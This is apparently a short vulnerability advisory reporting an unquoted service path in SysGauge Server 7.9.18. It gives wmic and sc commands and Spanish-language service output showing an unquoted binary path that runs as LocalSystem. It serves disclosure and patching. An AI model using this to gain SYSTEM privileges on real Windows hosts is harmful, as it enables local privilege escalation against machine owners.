SysGauge 7.9.18 Exploit, ' SysGauge Server' Unquoted Service Path

# Exploit Title: SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage:  https://www.sysgauge.com
# Software Link: https://www.sysgauge.com/setups/sysgaugesrv_setup_v7.9.18.exe
# Tested Version: 7.9.18
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

C:\>sc qc "SysGauge Server"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SysGauge Server
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 0   IGNORE
        NOMBRE_RUTA_BINARIO: C:\Program Files\SysGauge
Server\bin\sysgaus.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : SysGauge Server
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD